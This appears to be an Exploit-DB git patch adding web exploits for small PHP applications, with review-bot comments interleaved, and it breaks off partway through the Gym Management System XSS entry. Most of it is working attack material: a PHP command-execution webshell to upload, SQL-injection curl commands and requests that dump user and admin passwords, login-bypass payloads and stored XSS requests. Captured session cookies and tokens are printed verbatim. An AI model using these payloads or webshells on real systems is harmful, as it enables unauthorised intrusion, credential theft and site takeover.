From 99b2cc4c13426f2bf8a5a054c081332b270b26ef Mon Sep 17 00:00:00 2001 
From: Offensive Security
Date: Sat, 24 Oct 2020 05:02:08 +0000
Subject: [PATCH] DB: 2020-10-24
17 changes to exploits/shellcodes
Online Library Management System 1.0 - Arbitrary File Upload
Ajenti 2.1.36 - Remote Code Execution (Authenticated)
Stock Management System 1.0 - 'brandId and categoriesId' SQL Injection
Car Rental Management System 1.0 - Arbitrary File Upload
User Registration & Login and User Management System 2.1 - SQL Injection
Point of Sales 1.0 - 'id' SQL Injection
Lot Reservation Management System 1.0 - Authentication Bypass
Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)
Gym Management System 1.0 - 'id' SQL Injection
Point of Sales 1.0 - 'username' SQL Injection
School Faculty Scheduling System 1.0 - 'id' SQL Injection
School Faculty Scheduling System 1.0 - 'username' SQL Injection
Gym Management System 1.0 - Authentication Bypass
Gym Management System 1.0 - Stored Cross Site Scripting
Bludit 3.9.2 - Auth Bruteforce Bypass
TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated)
---
exploits/php/webapps/48636.txt | 1 +
exploits/php/webapps/48928.txt | 21 ++++
exploits/php/webapps/48930.txt | 41 ++++++++
exploits/php/webapps/48931.txt | 21 ++++
exploits/php/webapps/48932.txt | 23 +++++
exploits/php/webapps/48933.txt | 35 +++++++
exploits/php/webapps/48934.txt | 35 +++++++
exploits/php/webapps/48935.txt | 87 +++++++++++++++++
exploits/php/webapps/48936.txt | 25 +++++
exploits/php/webapps/48937.txt | 29 ++++++
exploits/php/webapps/48938.txt | 24 +++++
exploits/php/webapps/48939.txt | 24 +++++
exploits/php/webapps/48940.txt | 31 ++++++
exploits/php/webapps/48941.txt | 46 +++++++++
exploits/php/webapps/48942.py | 102 ++++++++++++++++++++
exploits/php/webapps/48943.py | 158 +++++++++++++++++++++++++++++++
exploits/python/webapps/48929.py | 53 +++++++++++
files_exploits.csv | 16 ++++
18 files changed, 772 insertions(+)
create mode 100644 exploits/php/webapps/48928.txt
create mode 100644 exploits/php/webapps/48930.txt
create mode 100644 exploits/php/webapps/48931.txt
create mode 100644 exploits/php/webapps/48932.txt
create mode 100644 exploits/php/webapps/48933.txt
create mode 100644 exploits/php/webapps/48934.txt
create mode 100644 exploits/php/webapps/48935.txt
create mode 100644 exploits/php/webapps/48936.txt
create mode 100644 exploits/php/webapps/48937.txt
create mode 100644 exploits/php/webapps/48938.txt
create mode 100644 exploits/php/webapps/48939.txt
create mode 100644 exploits/php/webapps/48940.txt
create mode 100644 exploits/php/webapps/48941.txt
create mode 100755 exploits/php/webapps/48942.py
create mode 100755 exploits/php/webapps/48943.py
create mode 100755 exploits/python/webapps/48929.py
diff --git a/exploits/php/webapps/48636.txt b/exploits/php/webapps/48636.txt
index 35326f319..599c53baf 100644
--- a/exploits/php/webapps/48636.txt
+++ b/exploits/php/webapps/48636.txt
@@ -4,6 +4,7 @@ # Vendor Homepage: http://ritecms.com/ # Version: 2.2.1 # Tested on: Linux +# CVE: CVE-2020-23934 1- Go to following url. >> http://(HOST)/cms/ 2- Default username and password is admin:admin. We must know login credentials.
diff --git a/exploits/php/webapps/48928.txt b/exploits/php/webapps/48928.txt
new file mode 100644
index 000000000..cbc0e8d28
--- /dev/null
+++ b/exploits/php/webapps/48928.txt
@@ -0,0 +1,21 @@ +# Exploit Title: Online Library Management System 1.0 - Arbitrary File Upload +# Date: 22-10-2020 +# Exploit Author: Jyotsna Adhana +# Vendor Homepage: https://www.sourcecodester.com/php/14545/online-library-management-system-phpmysqli-full-source-code-2020.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14545&title=Online+Library+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code+%282020%29 +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + + +#Vulnerable Page: http://localhost/librarysystem/admin/borrower/index.php?view=add + +#Exploit + Fill details + Create php shell code with below script + "; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?> + Click on Browse + Select php file + Click Save + Access below URL: + http://localhost/librarysystem/admin/borrower/photos/23102020080814backdoor.php?cmd=dir + add system commands after cmd to execute it. \ No newline at end of file diff --git a/exploits/php/webapps/48930.txt b/exploits/php/webapps/48930.txt new file mode 100644 index 000000000..2cf4e4bc8 --- /dev/null +++ b/exploits/php/webapps/48930.txt 
@@ -0,0 +1,41 @@ +# Exploit Title: Stock Management System 1.0 - SQL Injection +# Dork: N/A +# Date: 2020-10-22 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html +# Version: 1.0 +# Tested on: Linux +# CVE: N/A + +# POC: +# 1) +# +fetchSelectedBrand.php +# +$brandId = $_POST['brandId']; +$sql = "SELECT brand_id, brand_name, brand_active, brand_status FROM brands WHERE brand_id = $brandId"; +# +curl -i -s -k -X $'POST' \ + -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 170' -H $'Cookie: PHPSESSID=cjmjndhkna574kp8ui7puncct2' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ + -b $'PHPSESSID=cjmjndhkna574kp8ui7puncct2' \ + --data-binary $'brandId=-11 union select (SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_id,username,password,email,0x3c62723e))))x),2,3,4-- -' \ + $'http://localhost/ExploitDb/stock/php_action/fetchSelectedBrand.php' +# +# POC: +# 2) +# +fetchSelectedCategories.php +# +$categoriesId = $_POST['categoriesId']; +$sql = "SELECT categories_id, categories_name, categories_active, categories_status FROM categories WHERE categories_id = $categoriesId"; +# +curl -i -s -k -X $'POST' \ + -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 175' -H $'Cookie: 
PHPSESSID=cjmjndhkna574kp8ui7puncct2' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ + -b $'PHPSESSID=cjmjndhkna574kp8ui7puncct2' \ + --data-binary $'categoriesId=-11 union select (SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_id,username,password,email,0x3c62723e))))x),2,3,4-- -' \ + $'http://localhost/ExploitDb/stock/php_action/fetchSelectedCategories.php' +# +# ++ + +# \ No newline at end of file diff --git a/exploits/php/webapps/48931.txt b/exploits/php/webapps/48931.txt new file mode 100644 index 000000000..cb8e3f691 --- /dev/null +++ b/exploits/php/webapps/48931.txt @@ -0,0 +1,21 @@ +# Exploit Title: Car Rental Management System 1.0 - Arbitrary File Upload +# Date: 22-10-2020 +# Exploit Author: Jyotsna Adhana and Saurav Shukla +# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + + +#Vulnerable Page: http://localhost/carRental/admin/index.php?page=manage_car + +#Exploit + Fill details + Create php shell code with below script + "; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?> + Click on Browse + Select php file + Click Save + Access below URL: + http://localhost/carRental/admin/assets/uploads/cars_img/1603387740_backdoor.php?cmd=sysinfo + add system commands after cmd to execute it. \ No newline at end of file diff --git a/exploits/php/webapps/48932.txt b/exploits/php/webapps/48932.txt new file mode 100644 index 000000000..62f60a454 --- /dev/null +++ b/exploits/php/webapps/48932.txt 
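Review bot: 48930.txt quotes the root cause in both PoC blocks (`WHERE brand_id = $brandId` and `WHERE categories_id = $categoriesId`, each built straight from `$_POST`), but it never states the remediation, so anyone triaging the entry has to infer it. I would add one line after each quoted statement, for example `# Fix: cast the id to int and bind it in a prepared statement instead of interpolating $_POST into the query string`. The in-file title also reads only "SQL Injection", whereas the commit subject names the two affected parameters; carrying `'brandId and categoriesId'` into the title would make the entry searchable by parameter.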
@@ -0,0 +1,23 @@ +# Exploit Title: User Registration & Login and User Management System 2.1 - SQL Injection +# Dork: N/A +# Date: 2020-10-22 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://phpgurukul.com +# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ +# Version: 2.1 +# Tested on: Linux +# CVE: N/A + +# POC: +# 1) +# +curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),3,4,5,6,7-- -" | grep fname + +curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),4,5,6,7-- -" | grep lname + +curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,3,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),5,6,7-- -" | grep email + +curl -k "http://localhost/admin/update-profile.php?uid=-1' union select 1,2,3,4,5,(SELECT+GROUP_CONCAT(0x5b,0x49443a20,id,0x205d205b20,0x557365726e616d653a20,username,0x205d205b20,0x50617373776f72643a20,password,0x5d+SEPARATOR+0x3c62723e)+FROM+admin),7-- -" | grep contact +# +# +# \ No newline at end of file diff --git a/exploits/php/webapps/48933.txt b/exploits/php/webapps/48933.txt new file mode 100644 index 000000000..70d7a6ecf --- /dev/null +++ b/exploits/php/webapps/48933.txt 
@@ -0,0 +1,35 @@ +#Exploit Title: Point of Sales 1.0 - SQL Injection +#Date: 2020-10-22 +#Exploit Author: Ankita Pal +#Vendor Homepage: https://www.sourcecodester.com/php/14540/point-sales-phppdo-full-source-code-2020.html +#Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/pos_0.zip +#Version: V1.0 +#Tested on: Windows 10 + xampp v3.2.4 + + +Proof of Concept::: + +Step 1: Open the URL http://localhost:8081/pos/edit_category.php?id=1 + +Step 2: Change the URL http://localhost:8081/pos/edit_category.php?id=1' + +Step 3: Try to balance the query http://localhost:8081/pos/edit_category.php?id=1'--+ + +Step 4: Find the number of columns http://localhost:8081/pos/edit_category.php?id=1' order by 1,2--+ + +Step 5: Find which columns are visible http://localhost:8081/pos/edit_category.php?id=-1%27%20UNION%20Select%201,2--+ + + +Malicious Request::: + +GET /pos/edit_category.php?id=-1%27%20UNION%20Select%201,database()--+ HTTP/1.1 +Host: localhost:8081 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id +Upgrade-Insecure-Requests: 1 + +Gives database name *sourcecodester_posdb* \ No newline at end of file diff --git a/exploits/php/webapps/48934.txt b/exploits/php/webapps/48934.txt new file mode 100644 index 000000000..65e66a57e --- /dev/null +++ b/exploits/php/webapps/48934.txt 
@@ -0,0 +1,35 @@ +#Exploit Title: lot reservation management system 1.0 - Authentication Bypass +#Date: 2020-10-22 +#Exploit Author: Ankita Pal +#Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html +#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip +#Version: V1.0 +#Tested on: Windows 10 + xampp v3.2.4 + + +Proof of Concept::: + +Step 1: Open the URL http://localhost:8081/lot-reservation-management-system/admin/login.php + +Step 2: use payload ' or 1=1 limit 1 -- -+ for both username and password. + + +Malicious Request::: + +POST /lot-reservation-management-system/admin/ajax.php?action=login HTTP/1.1 +Host: localhost:8081 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: */* +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 71 +Origin: http://localhost:8081 +Connection: close +Referer: http://localhost:8081/lot-reservation-management-system/admin/login.php +Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id + +username='+or+1%3D1+limit+1+--+-%2B&password='+or+1%3D1+limit+1+--+-%2B + +You will be login as admin of the application. \ No newline at end of file diff --git a/exploits/php/webapps/48935.txt b/exploits/php/webapps/48935.txt new file mode 100644 index 000000000..73c0dc338 --- /dev/null +++ b/exploits/php/webapps/48935.txt 
@@ -0,0 +1,87 @@ +#Exploit Title: lot reservation management system 1.0 - Stored Cross Site Scripting +#Date: 2020-10-22 +#Exploit Author: Ankita Pal +#Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html +#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip +#Version: 1.0 +#Tested on: Windows 10 + xampp v3.2.4 + + +Proof of Concept::: + +Step 1: http://localhost:8081/lot-reservation-management-system/admin/index.php?page=divisions + +Step 2: Use payload in Name and Discription. + + +Malicious Request::: +POST /lot-reservation-management-system/admin/ajax.php?action=save_division HTTP/1.1 +Host: localhost:8081 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: */* +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------65714323539404637092301409097 +Content-Length: 613 +Origin: http://localhost:8081 +Connection: close +Referer: http://localhost:8081/lot-reservation-management-system/admin/index.php?page=divisions +Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id + +-----------------------------65714323539404637092301409097 +Content-Disposition: form-data; name="id" + + +-----------------------------65714323539404637092301409097 +Content-Disposition: form-data; name="name" + + +-----------------------------65714323539404637092301409097 +Content-Disposition: form-data; name="description" + + +-----------------------------65714323539404637092301409097 +Content-Disposition: form-data; name="img"; filename="" +Content-Type: application/octet-stream + + +-----------------------------65714323539404637092301409097-- + +-----------------------------3267707159765331982713791736 +Content-Disposition: form-data; name="gender" + +Female 
+-----------------------------3267707159765331982713791736 +Content-Disposition: form-data; name="contact" + +9876543211 +-----------------------------3267707159765331982713791736 +Content-Disposition: form-data; name="nid" + +12 +-----------------------------3267707159765331982713791736 +Content-Disposition: form-data; name="address" + +Gujarat +-----------------------------3267707159765331982713791736 +Content-Disposition: form-data; name="dept" + +CS +-----------------------------3267707159765331982713791736 +Content-Disposition: form-data; name="degree" + +BE +-----------------------------3267707159765331982713791736 +Content-Disposition: form-data; name="salary" + + +-----------------------------3267707159765331982713791736 +Content-Disposition: form-data; name="file"; filename="" +Content-Type: application/octet-stream + + +-----------------------------3267707159765331982713791736-- + + +Cookie will be reflected on View Employee. \ No newline at end of file diff --git a/exploits/php/webapps/48936.txt b/exploits/php/webapps/48936.txt new file mode 100644 index 000000000..072d2c1b2 --- /dev/null +++ b/exploits/php/webapps/48936.txt 
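Review bot: In 48935.txt the request body does not end at the closing boundary `...65714323539404637092301409097--`. It continues with a second multipart block under a different boundary (`...3267707159765331982713791736`) carrying employee fields (`gender`, `contact`, `nid`, `address`, `dept`, `degree`, `salary`), and the last line refers to "View Employee". None of that belongs to the `save_division` request documented above it, so it looks pasted from a different advisory. The stray block should be removed, and the closing sentence should name the page of this application where the stored value is rendered; as written, a reader cannot tell which view is affected. "Discription" in Step 2 should read "Description".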
@@ -0,0 +1,25 @@ +# Exploit Title: Gym Management System 1.0 - 'id' SQL Injection +# Date: 22/10/2020 +# Exploit Author: Jyotsna Adhana +# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +#parameter Vulnerable: id +# Injected Request + +GET /gym/gym/manage_user.php?id=-1+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Connection: close +Referer: http://localhost/gym/gym/index.php?page=users +Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re + + +//Comment +Above request will print database name and MariaDB version. \ No newline at end of file diff --git a/exploits/php/webapps/48937.txt b/exploits/php/webapps/48937.txt new file mode 100644 index 000000000..d3c91c717 --- /dev/null +++ b/exploits/php/webapps/48937.txt 
@@ -0,0 +1,29 @@ +# Exploit Title: Point of Sales 1.0 - 'username' SQL Injection +# Date: 22/10/2020 +# Exploit Author: Jyotsna Adhana +# Vendor Homepage: https://www.sourcecodester.com/php/14540/point-sales-phppdo-full-source-code-2020.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14540&title=Point+of+Sales+in+PHP%2FPDO+with+Full+Source+Code+%282020%29 +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +#parameter Vulnerable: username +# Injected Request + +POST /pos/pos/ HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 81 +Origin: http://localhost +Connection: close +Referer: http://localhost/pos/pos/ +Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D +Upgrade-Insecure-Requests: 1 + +username=admin' or '1'='1';SELECT SLEEP(5)#&password=admin' or '1'='1#&btn_login= + +//Comment +The reponse will be delayed by 5s. \ No newline at end of file diff --git a/exploits/php/webapps/48938.txt b/exploits/php/webapps/48938.txt new file mode 100644 index 000000000..842a98f3e --- /dev/null +++ b/exploits/php/webapps/48938.txt 
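Review bot: The captured request in 48937.txt publishes session material verbatim. Its `Cookie:` header carries a `PHPSESSID` together with full `laravel_session` and `XSRF-TOKEN` values that appear unrelated to the PHP/PDO application under test. The same header is repeated in 48938.txt, 48939.txt, 48940.txt and 48941.txt. I would replace the values with a placeholder such as `Cookie: PHPSESSID=REDACTED` and drop the unrelated cookies, so that each entry shows only what the endpoint needs and no live token is archived. The last line also has a typo, "reponse" for "response".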
@@ -0,0 +1,24 @@ +# Exploit Title: School Faculty Scheduling System 1.0 - 'id' SQL Injection +# Date: 22/10/2020 +# Exploit Author: Jyotsna Adhana +# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +#parameter Vulnerable: id +# Injected Request + +GET /schoolFSS/scheduling/admin/manage_user.php?id=-2515+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Connection: close +Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=users +Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D + +//Comment +Above request will print database name and MariaDB version. \ No newline at end of file diff --git a/exploits/php/webapps/48939.txt b/exploits/php/webapps/48939.txt new file mode 100644 index 000000000..aa3f0cf67 --- /dev/null +++ b/exploits/php/webapps/48939.txt 
@@ -0,0 +1,24 @@ +# Exploit Title: School Faculty Scheduling System 1.0 - 'username' SQL Injection +# Date: 22/10/2020 +# Exploit Author: Jyotsna Adhana +# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +#parameter Vulnerable: id +# Injected Request + +GET /schoolFSS/scheduling/admin/manage_user.php?id=-2515+UNION+ALL+SELECT+NULL,GROUP_CONCAT(database(),version()),NULL,NULL,NULL-- HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Connection: close +Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=users +Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D + +//Comment +Above request will print database name and MariaDB version. \ No newline at end of file diff --git a/exploits/php/webapps/48940.txt b/exploits/php/webapps/48940.txt new file mode 100644 index 000000000..d1c5d5e39 --- /dev/null +++ b/exploits/php/webapps/48940.txt 
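Review bot: The title of 48939.txt says `'username' SQL Injection`, but the body states `#parameter Vulnerable: id` and reproduces the same `GET .../manage_user.php?id=...` request as 48938.txt, so nothing in the entry describes a `username` parameter. Either the body should document the request that actually carries `username`, or the title should be corrected to match. As committed, the two entries are duplicates, and anyone tracking remediation per parameter will count a finding that is not documented.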
@@ -0,0 +1,31 @@ +# Exploit Title: Gym Management System 1.0 - Authentication Bypass +# Date: 21/10/2020 +# Exploit Author: Jyotsna Adhana +# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +Step 1: Open the URL http://localhost/gym/gym/login.php + +Step 2: use payload jyot' or 1=1# in Username and Password field + +Malicious Request + +POST /gym/gym/ajax.php?action=login HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 55 +Origin: http://localhost +Connection: close +Referer: http://localhost/gym/gym/login.php +Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; laravel_session=eyJpdiI6IlBXakg2NzB1cVBEWVZtemIwVzZ6NVE9PSIsInZhbHVlIjoiU2dsaTN1alRCXC9cL1I5dnNzRDlPRDlXTDZ4UUFiakhlN0JLVzB4MnpOVVZibnpISDNFS1k3YjdzWWM2UWRzVEZyIiwibWFjIjoiZGRmODE1NGFhN2JhY2U2NTNhOWU1MzViMjFjYWExM2UzNzYwN2QzZDZmNDQwNjcyMjA1MjJiYTI2NDU2Y2Q1MSJ9; XSRF-TOKEN=eyJpdiI6IlBSMFVNT3NoYkNNVTRpQzNDRHNDNXc9PSIsInZhbHVlIjoiSmF2WXRabHhCZHNZdVlmd1RGeU1pakdoT2JQaWdvcFgzK1QzeFJ6YzRiVGZ5VGdMcmp6SlMrbVl4cnZucG9OZSIsIm1hYyI6Ijc2NzA5MjYzM2E2NjgwMWZlZmFlM2JlOTI2ZmI2YTA3NmE2M2FiYjdlN2E2NzI1NmVhZjA2N2FmOTgwOTlkZGUifQ%3D%3D + +username=jyot'+or+1%3D1+%23&password=jyot'+or+1%3D1+%23 + +Step 3: You will be logged in as admin. \ No newline at end of file diff --git a/exploits/php/webapps/48941.txt b/exploits/php/webapps/48941.txt new file mode 100644 index 000000000..f499043bd --- /dev/null +++ b/exploits/php/webapps/48941.txt 
@@ -0,0 +1,46 @@ +# Exploit Title: Gym Management System 1.0 - Stored Cross Site Scripting +# Date: 21/10/2020 +# Exploit Author: Jyotsna Adhana +# Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14541&title=Gym+Management+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +Step 1: Open the URL http://localhost/gym/gym/index.php?page=packages + +Step 2: use payload in Package Name and Description field + +Malicious Request +POST /gym/gym/ajax.php?action=save_package HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------10391575234966392972740129710 +Content-Length: 587 +Origin: http://localhost +Connection: close +Referer: http://localhost/gym/gym/index.php?page=packages +Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re; 